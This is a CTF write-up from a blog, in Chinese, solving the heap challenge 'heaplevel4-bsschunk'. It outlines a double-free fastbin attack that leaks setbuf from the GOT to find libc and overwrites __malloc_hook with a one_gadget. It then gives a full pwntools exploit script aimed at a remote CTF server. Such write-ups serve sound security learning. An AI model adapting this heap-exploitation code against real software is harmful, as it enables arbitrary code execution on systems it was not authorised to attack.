MENU

Catalog

    *CTF double free & fastbin attack level4-bsschunk Writeup

    November 6, 2020 • Read: 1033 • Pwn

    一道简单的double free + fastbin attack。
    思路:
    1.利用第一次double free来修改fd为pool数组 - Offset的位置,然后修改pool数组的第一个位置为我们想要读取的位置,达到任意读取的目的。
    2.这里我们选择读取setbuf的got表,泄露setbuf的内容,然后利用泄露setbuf的地址来确定libc版本。
    3.修改__malloc_hook为one_gadget
    4.利用两次free造成异常,报错的时候会调用malloc,malloc->__malooc_hook_one_gadget

    from pwn import *
    from LibcSearcher import *
    #r = process('./heaplevel4-bsschunk')
    r = remote("pwn.sixstars.team", 22504)
    elf = ELF('./heaplevel4-bsschunk')
    
    def add_note(data):
        r.sendlineafter(">> ", "1")
        r.sendlineafter("Content: ", data)
    
    def show_note(idx):
        r.sendlineafter(">> ", "2")
        r.sendlineafter("id:", str(idx))
    
    def dele_note(idx):
        r.sendlineafter(">> ", "3")
        r.sendlineafter("id:", str(idx))
    
    
    add_note("a")
    add_note("b")
    dele_note(0)
    dele_note(1)
    dele_note(0)
    add_note(p64(0x6020C0 - 0x23))
    add_note("b")
    add_note("a")
    add_note('a' * 0x13 + p64(elf.got['setbuf']))
    
    show_note(0)
    setbuf_addr = u64(r.recvuntil('\n', drop=True).ljust(8, '\x00'))
    libc = LibcSearcher('setbuf', setbuf_addr)
    libc_base = setbuf_addr - libc.dump("setbuf")
    print hex(libc_base)
    
    add_note("c")
    add_note("d")
    dele_note(2)
    dele_note(3)
    dele_note(2)
    add_note(p64(libc_base + libc.dump("__malloc_hook") - 0x23))
    add_note("b")
    add_note("a")
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    one_addr = libc_base + one[2]
    add_note('a' * 0x13 + p64(one_addr))
    dele_note(2)
    #gdb.attach(r)
    dele_note(2)
    r.interactive()
    
    
    Archives QR Code
    QR Code for this page
    Tipping QR Code